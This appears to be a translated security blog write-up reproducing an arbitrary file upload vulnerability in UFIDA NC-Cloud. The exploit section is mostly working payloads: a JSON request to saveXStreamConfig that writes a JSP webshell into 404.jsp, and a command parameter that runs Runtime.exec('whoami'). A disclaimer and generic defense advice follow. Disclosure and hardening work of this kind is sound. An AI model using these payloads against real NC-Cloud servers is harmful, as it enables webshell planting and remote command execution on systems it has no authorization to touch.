Any file upload vulnerability in UFIDA full version reproduces

Statement
This article is only for technical communication, please do not use it for illegal purposes.
Any direct or indirect consequences and losses caused by the dissemination and utilization of the information provided in this article shall be the responsibility of the user himself, and the author of the article shall not be liable for any responsibility.
The author of the article has the right to modify and interpret this article. If you want to reprint or disseminate this article, you must ensure the integrity of this article, including all content such as the copyright statement. Without permission, the content of this article shall not be modified or added or deleted arbitrarily, and shall not be used for commercial purposes in any way.
 

Vulnerability principle

UFIDA NC-Cloud recently revealed that there is a vulnerability in the full version of arbitrary file upload. It has now been confirmed that this vulnerability can be exploited by an attacker, and it is not clear which minimum version this vulnerability applies to. Attackers can use this vulnerability to upload arbitrary files to the server, and then upload the webshell to the server, thereby gaining the command execution authority of the server.

exploit

Two pocs are required to exploit this vulnerability

The first POC:

{"serviceName":"nc.itf.iufo.IBaseSPService","methodName":"saveXStreamConfig","parameterTypes":["java.lang.Object","java.lang.String"],"parameters":["${param.getClass().forName(param.error).newInstance().eval(param.cmd)}","webapps/nc_web/404.jsp"]}

 After execution, there are two results, one is 404, and the other is 200. After testing, these two echoes are uploaded successfully.

The second POC is used for command execution:

cmd=org.apache.commons.io.IOUtils.toString(Runtime.getRuntime().exec("whoami").getInputStream())

 Vulnerability reproduction-POC

 defense advice

To defend against the arbitrary file upload vulnerability of the full version of UFIDA NC-Cloud, the following are some common defense measures:

1. Update patches in time: Make sure that the software version of UFIDA NC-Cloud is in the latest state, and apply security patches and updates released by suppliers in a timely manner. This helps to fix known vulnerabilities and improve the security of the system.

2. Restricting file uploads: By restricting the type, size, and target path of files uploaded by users, the risk of arbitrary file upload vulnerabilities can be effectively reduced. For example, verify file extensions and content, use a whitelist mechanism, and only allow specific file types to be uploaded.

3. File upload verification: When the server receives the uploaded file, it is very important to perform file verification. A secure file verification mechanism can be used, such as verifying the magic byte of the file, file header information, file ending, etc., to ensure that the uploaded file is the expected valid file and prevent malicious files from being uploaded.

4. Strengthened access control: Implement strict access control measures, including strong password policies, role rights management, and multi-factor authentication to reduce the risk of unauthorized access and abuse of vulnerabilities.

5. Security audit and monitoring: Implement security audit and monitoring mechanisms, regularly check system logs, access logs, and upload file logs, and discover abnormal activities and potential attacks in a timely manner.

6. Security education and training: Conduct security education and training for system administrators and users, improve their security awareness, let them understand common security threats and best practices, so that they can use the system correctly and deal with potential threats.